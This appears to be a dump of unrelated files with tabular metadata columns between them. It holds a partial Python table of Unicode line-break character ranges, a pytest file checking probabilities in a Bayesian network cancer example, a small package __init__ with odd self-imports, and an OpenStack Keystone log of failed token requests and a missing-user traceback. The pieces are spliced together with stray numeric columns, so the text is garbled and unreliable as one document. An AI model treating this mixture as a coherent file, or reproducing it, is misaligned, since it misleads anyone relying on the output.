\ud45d-\ud477\ud479-\ud493\ud495-\ud4af\ud4b1-\ud4cb\ud4cd-\ud4e7\ud4e9-\ud503\ud505-\ud51f\ud521-\ud53b\ud53d-\ud557\ud559-\ud573\ud575-\ud58f\ud591-\ud5ab\ud5ad-\ud5c7\ud5c9-\ud5e3\ud5e5-\ud5ff\ud601-\ud61b\ud61d-\ud637\ud639-\ud653\ud655-\ud66f\ud671-\ud68b\ud68d-\ud6a7\ud6a9-\ud6c3\ud6c5-\ud6df\ud6e1-\ud6fb\ud6fd-\ud717\ud719-\ud733\ud735-\ud74f\ud751-\ud76b\ud76d-\ud787\ud789-\ud7a3",
"hl": "\u05d0-\u05ea\u05f0-\u05f2\ufb1d\ufb1f-\ufb28\ufb2a-\ufb36\ufb38-\ufb3c\ufb3e\ufb40-\ufb41\ufb43-\ufb44\ufb46-\ufb4f",
"hy": "\x5c\x2d",
"id": "\u2e80-\u2e99\u2e9b-\u2ef3\u2f00-\u2fd5\u2ff0-\u2ffb\u3000\u3003-\u3004\u3006-\u3007\u3012-\u3013\u3020-\u3029\u3030-\u303a\u303d-\u303f\u3042\u3044\u3046\u3048\u304a-\u3062\u3064-\u3082\u3084\u3086\u3088-\u308d\u308f-\u3094\u309f\u30a2\u30a4\u30a6\u30a8\u30aa-\u30c2\u30c4-\u30e2\u30e4\u30e6\u30e8-\u30ed\u30ef-\u30f4\u30f7-\u30fa\u30ff\u3105-\u312d\u3131-\u318e\u3190-\u31ba\u31c0-\u31e3\u3200-\u321e\u3220-\u3247\u3250-\u32fe\u3300-\u4dbf\u4e00-\ua014\ua016-\ua48c\ua490-\ua4c6\uf900-\ufaff\ufe30-\ufe34\ufe45-\ufe46\ufe49-\ufe4f\ufe51\ufe58\ufe5f-\ufe66\ufe68\ufe6b\uff02-\uff03\uff06-\uff07\uff0a-\uff0b\uff0d\uff0f-\uff19\uff1c-\uff1e\uff20-\uff3a\uff3c\uff3e-\uff5a\uff5c\uff5e\uffe2-\uffe4\U0001b000-\U0001b001\U0001f200-\U0001f202\U0001f210-\U0001f23a\U0001f240-\U0001f248\U0001f250-\U0001f251\U00020000-\U0002fffd\U00030000-\U0003fffd",
"in": "\u2024-\u2026\ufe19",
"is": "\x2c\x2e\x3a-\x3b\u037e\u0589\u060c-\u060d\u07f8\u2044\ufe10\ufe13-\ufe14",
"jl": "\u1100-\u115f\ua960-\ua97c",
"jt": "\u11a8-\u11ff\ud7cb-\ud7fb",
"jv": "\u1160-\u11a7\ud7b0-\ud7c6",
"lf": "\x0a",
"nl": "\x85",
"ns": "\u17d6\u203c-\u203d\u2047-\u2049\u3005\u301c\u303b-\u303c\u309b-\u309e\u30a0\u30fb\u30fd-\u30fe\ua015\ufe54-\ufe55\uff1a-\uff1b\uff65\uff9e-\uff9f",
"nu": "\x30-\x39\u0660-\u0669\u066b-\u066c\u06f0-\u06f9\u07c0-\u07c9\u0966-\u096f\u09e6-\u09ef\u0a66-\u0a6f\u0ae6-\u0aef\u0b66-\u0b6f\u0be6-\u0bef\u0c66-\u0c6f\u0ce6-\u0cef\u0d66-\u0d6f\u0e50-\u0e59\u0ed0-\u0ed9\u0f20-\u0f29\u1040-\u1049\u1090-\u1099\u17e0-\u17e9\u1810-\u1819\u1946-\u194f\u19d0-\u19d9\u1a80-\u1a89\u1a90-\u1a99\u1b50-\u1b59\u1bb0-\u1bb9\u1c40-\u1c49\u1c50-\u1c59\ua620-\ua629\ua8d0-\ua8d9\ua900-\ua909\ua9d0-\ua9d9\uaa50-\uaa59\uabf0-\uabf9\U000104a0-\U000104a9\U00011066-\U0001106f\U000110f0-\U000110f9\U00011136-\U0001113f\U000111d0-\U000111d9\U000116c0-\U000116c9\U0001d7ce-\U0001d7ff",
"op": "\x28\x5c\x5b\x7b\xa1\xbf\u0f3a\u0f3c\u169b\u201a\u201e\u2045\u207d\u208d\u2329\u2768\u276a\u276c\u276e\u2770\u2772\u2774\u27c5\u27e6\u27e8\u27ea\u27ec\u27ee\u2983\u2985\u2987\u2989\u298b\u298d\u298f\u2991\u2993\u2995\u2997\u29d8\u29da\u29fc\u2e18\u2e22\u2e24\u2e26\u2e28\u3008\u300a\u300c\u300e\u3010\u3014\u3016\u3018\u301a\u301d\ufd3e\ufe17\ufe35\ufe37\ufe39\ufe3b\ufe3d\ufe3f\ufe41\ufe43\ufe47\ufe59\ufe5b\ufe5d\uff08\uff3b\uff5b\uff5f\uff62\U00013258-\U0001325a\U00013286\U00013288\U00013379",
"po": "\x25\xa2\xb0\u0609-\u060b\u066a\u09f2-\u09f3\u09f9\u0d79\u2030-\u2037\u20a7\u20b6\u2103\u2109\ua838\ufdfc\ufe6a\uff05\uffe0",
"pr": "\x24\x2b\x5c\x5c\xa3-\xa5\xb1\u058f\u09fb\u0af1\u0bf9\u0e3f\u17db\u20a0-\u20a6\u20a8-\u20b5\u20b7-\u20b9\u2116\u2212-\u2213\ufe69\uff04\uffe1\uffe5-\uffe6",
"qu": "\x22\x27\xab\xbb\u2018-\u2019\u201b-\u201d\u201f\u2039-\u203a\u275b-\u275e\u2e00-\u2e0d\u2e1c-\u2e1d\u2e20-\u2e21",
"sa": "\u0e01-\u0e3a\u0e40-\u0e4e\u0e81-\u0e82\u0e84\u0e87-\u0e88\u0e8a\u0e8d\u0e94-\u0e97\u0e99-\u0e9f\u0ea1-\u0ea3\u0ea5\u0ea7\u0eaa-\u0eab\u0ead-\u0eb9\u0ebb-\u0ebd\u0ec0-\u0ec4\u0ec6\u0ec8-\u0ecd\u0edc-\u0edf\u1000-\u103f\u1050-\u108f\u109a-\u109f\u1780-\u17d3\u17d7\u17dc-\u17dd\u1950-\u196d\u1970-\u1974\u1980-\u19ab\u19b0-\u19c9\u19da\u19de-\u19df\u1a20-\u1a5e\u1a60-\u1a7c\u1aa0-\u1aad\uaa60-\uaa7b\uaa80-\uaac2\uaadb-\uaadf",
"sg": "\ud800-\udfff",
"sp": "\x20",
"sy": "\x2f",
"wj": "\u2060\ufeff",
"xx": "\u0378-\u0379\u037f-\u0383\u038b\u038d\u03a2\u0528-\u0530\u0557-\u0558\u0560\u0588\u058b-\u058e\u0590\u05c8-\u05cf\u05eb-\u05ef\u05f5-\u05ff\u0605\u061c-\u061d\u070e\u074b-\u074c\u07b2-\u07bf\u07fb-\u07ff\u082e-\u082f\u083f\u085c-\u085d\u085f-\u089f\u08a1\u08ad-\u08e3\u08ff\u0978\u0980\u0984\u098d-\u098e\u0991-\u0992\u09a9\u09b1\u09b3-\u09b5\u09ba-\u09bb\u09c5-\u09c6\u09c9-\u09ca\u09cf-\u09d6\u09d8-\u09db\u09de\u09e4-\u09e5\u09fc-\u0a00\u0a04\u0a0b-\u0a0e\u0a11-\u0a12\u0a29\u0a31\u0a34\u0a37\u0a3a-\u0a3b\u0a3d\u0a43-\u0a46\u0a49-\u0a4a\u0a4e-\u0a50\u0a52-\u0a58\u0a5d\u0a5f-\u0a65\u0a76-\u0a80\u0a84\u0a8e\u0a92\u0aa9\u0ab1\u0ab4\u0aba-\u0abb\u0ac6\u0aca\u0ace-\u0acf\u0ad1-\u0adf\u0ae4-\u0ae5\u0af2-\u0b00\u0b04\u0b0d-\u0b0e\u0b11-\u0b12\u0b29\u0b31\u0b34\u0b3a-\u0b3b\u0b45-\u0b46\u0b49-\u0b4a\u0b4e-\u0b55\u0b58-\u0b5b\u0b5e\u0b64-\u0b65\u0b78-\u0b81\u0b84\u0b8b-\u0b8d\u0b91\u0b96-\u0b98\u0b9b\u0b9d\u0ba0-\u0ba2\u0ba5-\u0ba7\u0bab-\u0bad\u0bba-\u0bbd\u0bc3-\u0bc5\u0bc9\u0bce-\u0bcf\u0bd1-\u0bd6\u0bd8-\u0be5\u0bfb-\u0c00\u0c04\u0c0d\u0c11\u0c29\u0c34\u0c3a-\u0c3c\u0c45\u0c49\u0c4e-\u0c54\u0c57\u0c5a-\u0c5f\u0c64-\u0c65\u0c70-\u0c77\u0c80-\u0c81\u0c84\u0c8d\u0c91\u0ca9\u0cb4\u0cba-\u0cbb\u0cc5\u0cc9\u0cce-\u0cd4\u0cd7-\u0cdd\u0cdf\u0ce4-\u0ce5\u0cf0\u0cf3-\u0d01\u0d04\u0d0d\u0d11\u0d3b-\u0d3c\u0d45\u0d49\u0d4f-\u0d56\u0d58-\u0d5f\u0d64-\u0d65\u0d76-\u0d78\u0d80-\u0d81\u0d84\u0d97-\u0d99\u0db2\u0dbc\u0dbe-\u0dbf\u0dc7-\u0dc9\u0dcb-\u0dce\u0dd5\u0dd7\u0de0-\u0df1\u0df5-\u0e00\u0e3b-\u0e3e\u0e5c-\u0e80\u0e83\u0e85-\u0e86\u0e89\u0e8b-\u0e8c\u0e8e-\u0e93\u0e98\u0ea0\u0ea4\u0ea6\u0ea8-\u0ea9\u0eac\u0eba\u0ebe-\u0ebf\u0ec5\u0ec7\u0ece-\u0ecf\u0eda-\u0edb\u0ee0-\u0eff\u0f48\u0f6d-\u0f70\u0f98\u0fbd\u0fcd\u0fdb-\u0fff\u10c6\u10c8-\u10cc\u10ce-\u10cf\u1249\u124e-\u124f\u1257\u1259\u125e-\u125f\u1289\u128e-\u128f\u12b1\u12b6-\u12b7\u12bf\u12c1\u12c6-\u12c7\u12d7\u1311\u1316-\u1317\u135b-\u135c\u137d-\u137f\u139a-\u139f\u13f5-\u13ff\u169d-\u169f\u16f1-\u16ff\u170d\u1715-\u171f\u1737-\u173f\u1754-\u175f\u176d\u1771\u1774-\u177f\u17de-\u17df\u17ea-\u17ef\u17fa-\u17ff\u180f\u181a-\u181f\u1878-\u187f\u18ab-\u18af\u18f6-\u18ff\u191d-\u191f\u192c-\u192f\u193c-\u193f\u1941-\u1943\u196e-\u196f\u1975-\u197f\u19ac-\u19af\u19ca-\u19cf\u19db-\u19dd\u1a1c-\u1a1d\u1a5f\u1a7d-\u1a7e\u1a8a-\u1a8f\u1a9a-\u1a9f\u1aae-\u1aff\u1b4c-\u1b4f\u1b7d-\u1b7f\u1bf4-\u1bfb\u1c38-\u1c3a\u1c4a-\u1c4c\u1c80-\u1cbf\u1cc8-\u1ccf\u1cf7-\u1cff\u1de7-\u1dfb\u1f16-\u1f17\u1f1e-\u1f1f\u1f46-\u1f47\u1f4e-\u1f4f\u1f58\u1f5a\u1f5c\u1f5e\u1f7e-\u1f7f\u1fb5\u1fc5\u1fd4-\u1fd5\u1fdc\u1ff0-\u1ff1\u1ff5\u1fff\u2065-\u2069\u2072-\u2073\u208f\u209d-\u209f\u20ba-\u20cf\u20f1-\u20ff\u218a-\u218f\u23f4-\u23ff\u2427-\u243f\u244b-\u245f\u2700\u2b4d-\u2b4f\u2b5a-\u2bff\u2c2f\u2c5f\u2cf4-\u2cf8\u2d26\u2d28-\u2d2c\u2d2e-\u2d2f\u2d68-\u2d6e\u2d71-\u2d7e\u2d97-\u2d9f\u2da7\u2daf\u2db7\u2dbf\u2dc7\u2dcf\u2dd7\u2ddf\u2e3c-\u2e7f\u2e9a\u2ef4-\u2eff\u2fd6-\u2fef\u2ffc-\u2fff\u3040\u3097-\u3098\u3100-\u3104\u312e-\u3130\u318f\u31bb-\u31bf\u31e4-\u31ef\u321f\u32ff\ua48d-\ua48f\ua4c7-\ua4cf\ua62c-\ua63f\ua698-\ua69e\ua6f8-\ua6ff\ua78f\ua794-\ua79f\ua7ab-\ua7f7\ua82c-\ua82f\ua83a-\ua83f\ua878-\ua87f\ua8c5-\ua8cd\ua8da-\ua8df\ua8fc-\ua8ff\ua954-\ua95e\ua97d-\ua97f\ua9ce\ua9da-\ua9dd\ua9e0-\ua9ff\uaa37-\uaa3f\uaa4e-\uaa4f\uaa5a-\uaa5b\uaa7c-\uaa7f\uaac3-\uaada\uaaf7-\uab00\uab07-\uab08\uab0f-\uab10\uab17-\uab1f\uab27\uab2f-\uabbf\uabee-\uabef\uabfa-\uabff\ud7a4-\ud7af\ud7c7-\ud7ca\ud7fc-\ud7ff\ue000-\uf8ff\ufb07-\ufb12\ufb18-\ufb1c\ufb37\ufb3d\ufb3f\ufb42\ufb45\ufbc2-\ufbd2\ufd40-\ufd4f\ufd90-\ufd91\ufdc8-\ufdef\ufdfe-\ufdff\ufe1a-\ufe1f\ufe27-\ufe2f\ufe53\ufe67\ufe6c-\ufe6f\ufe75\ufefd-\ufefe\uff00\uffbf-\uffc1\uffc8-\uffc9\uffd0-\uffd1\uffd8-\uffd9\uffdd-\uffdf\uffe7\uffef-\ufff8\ufffe-\uffff\U0001000c\U00010027\U0001003b\U0001003e\U0001004e-\U0001004f\U0001005e-\U0001007f\U000100fb-\U000100ff\U00010103-\U00010106\U00010134-\U00010136\U0001018b-\U0001018f\U0001019c-\U000101cf\U000101fe-\U0001027f\U0001029d-\U0001029f\U000102d1-\U000102ff\U0001031f\U00010324-\U0001032f\U0001034b-\U0001037f\U0001039e\U000103c4-\U000103c7\U000103d6-\U000103ff\U0001049e-\U0001049f\U000104aa-\U000107ff\U00010806-\U00010807\U00010809\U00010836\U00010839-\U0001083b\U0001083d-\U0001083e\U00010856\U00010860-\U000108ff\U0001091c-\U0001091e\U0001093a-\U0001093e\U00010940-\U0001097f\U000109b8-\U000109bd\U000109c0-\U000109ff\U00010a04\U00010a07-\U00010a0b\U00010a14\U00010a18\U00010a34-\U00010a37\U00010a3b-\U00010a3e\U00010a48-\U00010a4f\U00010a59-\U00010a5f\U00010a80-\U00010aff\U00010b36-\U00010b38\U00010b56-\U00010b57\U00010b73-\U00010b77\U00010b80-\U00010bff\U00010c49-\U00010e5f\U00010e7f-\U00010fff\U0001104e-\U00011051\U00011070-\U0001107f\U000110c2-\U000110cf\U000110e9-\U000110ef\U000110fa-\U000110ff\U00011135\U00011144-\U0001117f\U000111c9-\U000111cf\U000111da-\U0001167f\U000116b8-\U000116bf\U000116ca-\U00011fff\U0001236f-\U000123ff\U00012463-\U0001246f\U00012474-\U00012fff\U0001342f-\U000167ff\U00016a39-\U00016eff\U00016f45-\U00016f4f\U00016f7f-\U00016f8e\U00016fa0-\U0001afff\U0001b002-\U0001cfff\U0001d0f6-\U0001d0ff\U0001d127-\U0001d128\U0001d1de-\U0001d1ff\U0001d246-\U0001d2ff\U0001d357-\U0001d35f\U0001d372-\U0001d3ff\U0001d455\U0001d49d\U0001d4a0-\U0001d4a1\U0001d4a3-\U0001d4a4\U0001d4a7-\U0001d4a8\U0001d4ad\U0001d4ba\U0001d4bc\U0001d4c4\U0001d506\U0001d50b-\U0001d50c\U0001d515\U0001d51d\U0001d53a\U0001d53f\U0001d545\U0001d547-\U0001d549\U0001d551\U0001d6a6-\U0001d6a7\U0001d7cc-\U0001d7cd\U0001d800-\U0001edff\U0001ee04\U0001ee20\U0001ee23\U0001ee25-\U0001ee26\U0001ee28\U0001ee33\U0001ee38\U0001ee3a\U0001ee3c-\U0001ee41\U0001ee43-\U0001ee46\U0001ee48\U0001ee4a\U0001ee4c\U0001ee50\U0001ee53\U0001ee55-\U0001ee56\U0001ee58\U0001ee5a\U0001ee5c\U0001ee5e\U0001ee60\U0001ee63\U0001ee65-\U0001ee66\U0001ee6b\U0001ee73\U0001ee78\U0001ee7d\U0001ee7f\U0001ee8a\U0001ee9c-\U0001eea0\U0001eea4\U0001eeaa\U0001eebc-\U0001eeef\U0001eef2-\U0001efff\U0001f02c-\U0001f02f\U0001f094-\U0001f09f\U0001f0af-\U0001f0b0\U0001f0bf-\U0001f0c0\U0001f0d0\U0001f0e0-\U0001f0ff\U0001f10b-\U0001f10f\U0001f12f\U0001f16c-\U0001f16f\U0001f19b-\U0001f1e5\U0001f203-\U0001f20f\U0001f23b-\U0001f23f\U0001f249-\U0001f24f\U0001f252-\U0001f2ff\U0001f321-\U0001f32f\U0001f336\U0001f37d-\U0001f37f\U0001f394-\U0001f39f\U0001f3c5\U0001f3cb-\U0001f3df\U0001f3f1-\U0001f3ff\U0001f43f\U0001f441\U0001f4f8\U0001f4fd-\U0001f4ff\U0001f53e-\U0001f53f\U0001f544-\U0001f54f\U0001f568-\U0001f5fa\U0001f641-\U0001f644\U0001f650-\U0001f67f\U0001f6c6-\U0001f6ff\U0001f774-\U0001ffff\U0002fffe-\U0002ffff\U0003fffe-\U000e0000\U000e0002-\U000e001f\U000e0080-\U000e00ff\U000e01f0-\U0010ffff",
"zw": "\u200b"
}
ascii_line_break = {
"^ai": "\x00-\U0010ffff",
"^al": "\x00-\x22\x24-\x25\x27-\x29\x2b-\x3b\x3f\x5c\x5b-\x5c\x5d\x7b-\x7d\x7f-\U0010ffff",
"^b2": "\x00-\U0010ffff",
"^ba": "\x00-\x08\x0a-\x7b\x7d-\U0010ffff",
"^bb": "\x00-\U0010ffff",
"^bk": "\x00-\x0a\x0d-\U0010ffff",
"^cb": "\x00-\U0010ffff",
"^cj": "\x00-\U0010ffff",
"^cl": "\x00-\x5c\x7c\x5c\x7e-\U0010ffff",
"^cm": "\x09-\x0d\x20-\x5c\x7e\x80-\U0010ffff",
"^cp": "\x00-\x28\x2a-\x5c\x5c\x5c\x5e-\U0010ffff",
"^cr": "\x00-\x0c\x0e-\U0010ffff",
"^ex": "\x00-\x20\x22-\x3e\x40-\U0010ffff",
"^gl": "\x00-\U0010ffff",
"^h2": "\x00-\U0010ffff",
"^h3": "\x00-\U0010ffff",
"^hl": "\x00-\U0010ffff",
"^hy": "\x00-\x2c\x2e-\U0010ffff",
"^id": "\x00-\U0010ffff",
"^in": "\x00-\U0010ffff",
"^is": "\x00-\x2b\x5c\x2d\x2f-\x39\x3c-\U0010ffff",
"^jl": "\x00-\U0010ffff",
"^jt": "\x00-\U0010ffff",
"^jv": "\x00-\U0010ffff",
"^lf": "\x00-\x09\x0b-\U0010ffff",
"^nl": "\x00-\U0010ffff",
"^ns": "\x00-\U0010ffff",
"^nu": "\x00-\x2f\x3a-\U0010ffff",
"^op": "\x00-\x27\x29-\x5a\x5c\x5c-\x7a\x5c\x7c-\U0010ffff",
"^po": "\x00-\x24\x5c\x26-\U0010ffff",
"^pr": "\x00-\x23\x25-\x2a\x2c-\x5c\x5b\x5c\x5d-\U0010ffff",
"^qu": "\x00-\x21\x23-\x5c\x26\x28-\U0010ffff",
"^sa": "\x00-\U0010ffff",
"^sg": "\x00-\U0010ffff",
"^sp": "\x00-\x1f\x21-\U0010ffff",
"^sy": "\x00-\x2e\x30-\U0010ffff",
"^wj": "\x00-\U0010ffff",
"^xx": "\x00-\x7f",
"^zw": "\x00-\U0010ffff",
"ai": "",
"al": "\x23\x5c\x26\x2a\x3c-\x3e\x40-\x5a\x5c\x5e-\x7a\x5c\x7e",
"b2": "",
"ba": "\x09\x5c\x7c",
"bb": "",
"bk": "\x0b-\x0c",
"cb": "",
"cj": "",
"cl": "\x7d",
"cm": "\x00-\x08\x0e-\x1f\x7f",
"cp": "\x29\x5c\x5d",
"cr": "\x0d",
"ex": "\x21\x3f",
"gl": "",
"h2": "",
"h3": "",
"hl": "",
"hy": "\x5c\x2d",
"id": "",
"in": "",
"is": "\x2c\x2e\x3a-\x3b",
"jl": "",
"jt": "",
"jv": "",
"lf": "\x0a",
"nl": "",
"ns": "",
"nu": "\x30-\x39",
"op": "\x28\x5c\x5b\x7b",
"po": "\x25",
"pr": "\x24\x2b\x5c\x5c",
"qu": "\x22\x27",
"sa": "",
"sg": "",
"sp": "\x20",
"sy": "\x2f",
"wj": "",
"xx": "\x80-\U0010ffff",
"zw": ""
}
| 414.558282
| 8,080
| 0.776908
| 9,600
| 67,573
| 5.468125
| 0.467396
| 0.004572
| 0.000686
| 0.000914
| 0.614413
| 0.57799
| 0.560921
| 0.519717
| 0.494076
| 0.472054
| 0
| 0.418487
| 0.014088
| 67,573
| 162
| 8,081
| 417.117284
| 0.369463
| 0.000829
| 0
| 0.15
| 1
| 0.2875
| 0.97156
| 0.957222
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
db69408c9223e3093a0e568467e6c4c0ff4e7312
| 4,657
|
py
|
Python
|
bayesian/test/examples/bbns/test_cancer.py
|
timgates42/bayesian-belief-networks
|
23c3e3ce1c7f99d83efb79f9b7798af2a1537e1c
|
[
"Apache-2.0"
] | 734
|
2015-01-05T21:25:01.000Z
|
2022-03-16T12:12:20.000Z
|
bayesian/test/examples/bbns/test_cancer.py
|
timgates42/bayesian-belief-networks
|
23c3e3ce1c7f99d83efb79f9b7798af2a1537e1c
|
[
"Apache-2.0"
] | 11
|
2015-01-20T16:22:48.000Z
|
2021-05-12T13:01:11.000Z
|
bayesian/test/examples/bbns/test_cancer.py
|
timgates42/bayesian-belief-networks
|
23c3e3ce1c7f99d83efb79f9b7798af2a1537e1c
|
[
"Apache-2.0"
] | 222
|
2015-01-06T09:28:53.000Z
|
2022-03-04T10:38:32.000Z
|
'''Test the cancer example as a BBN.'''
from bayesian.bbn import build_bbn
from bayesian.examples.bbns.cancer import fP, fS, fC, fX, fD
def pytest_funcarg__cancer_graph(request):
g = build_bbn(
fP, fS, fC, fX, fD,
domains={
'P': ['low', 'high']})
return g
def close_enough(x, y, r=3):
return round(x, r) == round(y, r)
class TestCancerGraph():
'''
See table 2.2 of BAI_Chapter2.pdf
For verification of results.
(Note typo in some values)
'''
def test_no_evidence(self, cancer_graph):
'''Column 2 of upper half of table'''
result = cancer_graph.query()
assert close_enough(result[('P', 'high')], 0.1)
assert close_enough(result[('P', 'low')], 0.9)
assert close_enough(result[('S', True)], 0.3)
assert close_enough(result[('S', False)], 0.7)
assert close_enough(result[('C', True)], 0.012)
assert close_enough(result[('C', False)], 0.988)
assert close_enough(result[('X', True)], 0.208)
assert close_enough(result[('X', False)], 0.792)
assert close_enough(result[('D', True)], 0.304)
assert close_enough(result[('D', False)], 0.696)
def test_D_True(self, cancer_graph):
'''Column 3 of upper half of table'''
result = cancer_graph.query(D=True)
assert close_enough(result[('P', 'high')], 0.102)
assert close_enough(result[('P', 'low')], 0.898)
assert close_enough(result[('S', True)], 0.307)
assert close_enough(result[('S', False)], 0.693)
assert close_enough(result[('C', True)], 0.025)
assert close_enough(result[('C', False)], 0.975)
assert close_enough(result[('X', True)], 0.217)
assert close_enough(result[('X', False)], 0.783)
assert close_enough(result[('D', True)], 1)
assert close_enough(result[('D', False)], 0)
def test_S_True(self, cancer_graph):
'''Column 4 of upper half of table'''
result = cancer_graph.query(S=True)
assert close_enough(result[('P', 'high')], 0.1)
assert close_enough(result[('P', 'low')], 0.9)
assert close_enough(result[('S', True)], 1)
assert close_enough(result[('S', False)], 0)
assert close_enough(result[('C', True)], 0.032)
assert close_enough(result[('C', False)], 0.968)
assert close_enough(result[('X', True)], 0.222)
assert close_enough(result[('X', False)], 0.778)
assert close_enough(result[('D', True)], 0.311)
assert close_enough(result[('D', False)], 0.689)
def test_C_True(self, cancer_graph):
'''Column 5 of upper half of table'''
result = cancer_graph.query(C=True)
assert close_enough(result[('P', 'high')], 0.249)
assert close_enough(result[('P', 'low')], 0.751)
assert close_enough(result[('S', True)], 0.825)
assert close_enough(result[('S', False)], 0.175)
assert close_enough(result[('C', True)], 1)
assert close_enough(result[('C', False)], 0)
assert close_enough(result[('X', True)], 0.9)
assert close_enough(result[('X', False)], 0.1)
assert close_enough(result[('D', True)], 0.650)
assert close_enough(result[('D', False)], 0.350)
def test_C_True_S_True(self, cancer_graph):
'''Column 6 of upper half of table'''
result = cancer_graph.query(C=True, S=True)
assert close_enough(result[('P', 'high')], 0.156)
assert close_enough(result[('P', 'low')], 0.844)
assert close_enough(result[('S', True)], 1)
assert close_enough(result[('S', False)], 0)
assert close_enough(result[('C', True)], 1)
assert close_enough(result[('C', False)], 0)
assert close_enough(result[('X', True)], 0.9)
assert close_enough(result[('X', False)], 0.1)
assert close_enough(result[('D', True)], 0.650)
assert close_enough(result[('D', False)], 0.350)
def test_D_True_S_True(self, cancer_graph):
'''Column 7 of upper half of table'''
result = cancer_graph.query(D=True, S=True)
assert close_enough(result[('P', 'high')], 0.102)
assert close_enough(result[('P', 'low')], 0.898)
assert close_enough(result[('S', True)], 1)
assert close_enough(result[('S', False)], 0)
assert close_enough(result[('C', True)], 0.067)
assert close_enough(result[('C', False)], 0.933)
assert close_enough(result[('X', True)], 0.247)
assert close_enough(result[('X', False)], 0.753)
assert close_enough(result[('D', True)], 1)
assert close_enough(result[('D', False)], 0)
| 42.336364
| 60
| 0.594804
| 669
| 4,657
| 3.99701
| 0.158445
| 0.250935
| 0.381451
| 0.516081
| 0.835826
| 0.809648
| 0.799925
| 0.512341
| 0.501496
| 0.469708
| 0
| 0.052222
| 0.22697
| 4,657
| 109
| 61
| 42.724771
| 0.690556
| 0.06764
| 0
| 0.361446
| 0
| 0
| 0.025683
| 0
| 0
| 0
| 0
| 0
| 0.722892
| 1
| 0.096386
| false
| 0
| 0.024096
| 0.012048
| 0.156627
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbb6d0a05a6e3897af909f905708ada70741eb64
| 134
|
py
|
Python
|
botomatic/__init__.py
|
xeila00/botomatic
|
f5a5dcb528b6c77766ffb5ce24f4086081536cf5
|
[
"BSD-2-Clause"
] | null | null | null |
botomatic/__init__.py
|
xeila00/botomatic
|
f5a5dcb528b6c77766ffb5ce24f4086081536cf5
|
[
"BSD-2-Clause"
] | null | null | null |
botomatic/__init__.py
|
xeila00/botomatic
|
f5a5dcb528b6c77766ffb5ce24f4086081536cf5
|
[
"BSD-2-Clause"
] | null | null | null |
from botomatic import TBot
from bookbookgoose import TBot
from magic8ball import TBot
from __init__ import TBot
from bc_l import TBot
| 22.333333
| 30
| 0.850746
| 21
| 134
| 5.190476
| 0.428571
| 0.458716
| 0.513761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008772
| 0.149254
| 134
| 5
| 31
| 26.8
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
915b5d9d2556938b997978083bca0a3a09df6982
| 8,512
|
wsgi
|
Python
|
Day 3/keystone.common.wsgi
|
AgentKD6-37/2022-01-04-Python
|
668d7fda3fb5143f4790d7b3497987db083c00a9
|
[
"MIT"
] | 1
|
2022-01-14T18:08:04.000Z
|
2022-01-14T18:08:04.000Z
|
Day 3/keystone.common.wsgi
|
AgentKD6-37/2022-01-04-Python
|
668d7fda3fb5143f4790d7b3497987db083c00a9
|
[
"MIT"
] | null | null | null |
Day 3/keystone.common.wsgi
|
AgentKD6-37/2022-01-04-Python
|
668d7fda3fb5143f4790d7b3497987db083c00a9
|
[
"MIT"
] | null | null | null |
2017-07-30 17:20:20.455 3279 INFO keystone.common.wsgi [req-b28d7cf9-8591-4629-99a1-bdcd85b046b4 - - - - -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:20.506 3279 WARNING keystone.common.wsgi [req-b28d7cf9-8591-4629-99a1-bdcd85b046b4 - - - - -] Authorization failed. The request you have made requires authentication. from 172.16.1.5
2017-07-30 17:20:22.553 3280 INFO keystone.common.wsgi [req-ef70efb4-0b60-4738-b8ba-204c657aebcc - - - - -] GET http://controller:5000/v3/
2017-07-30 17:20:22.564 3279 INFO keystone.common.wsgi [req-2a491a01-a525-46e6-ba26-b2d53ab02567 - - - - -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:22.727 3279 INFO keystone.token.providers.fernet.utils [req-2a491a01-a525-46e6-ba26-b2d53ab02567 - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:24.228 3280 INFO keystone.common.wsgi [req-e34f17f4-4957-4117-a174-73fb8de19d29 - - - - -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:24.293 3280 WARNING keystone.common.wsgi [req-e34f17f4-4957-4117-a174-73fb8de19d29 - - - - -] Authorization failed. The request you have made requires authentication. from 172.16.1.5
2017-07-30 17:20:29.055 3278 INFO keystone.common.wsgi [req-98982a97-90ca-411f-843d-c4dd5186fe5a - - - - -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core [req-98982a97-90ca-411f-843d-c4dd5186fe5a - - - - -] Could not find user: root
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core Traceback (most recent call last):
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/auth/plugins/core.py", line 173, in _validate_and_normalize_auth_data
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core user_name, domain_ref['id'])
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/common/manager.py", line 124, in wrapped
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core __ret_val = __f(*args, **kwargs)
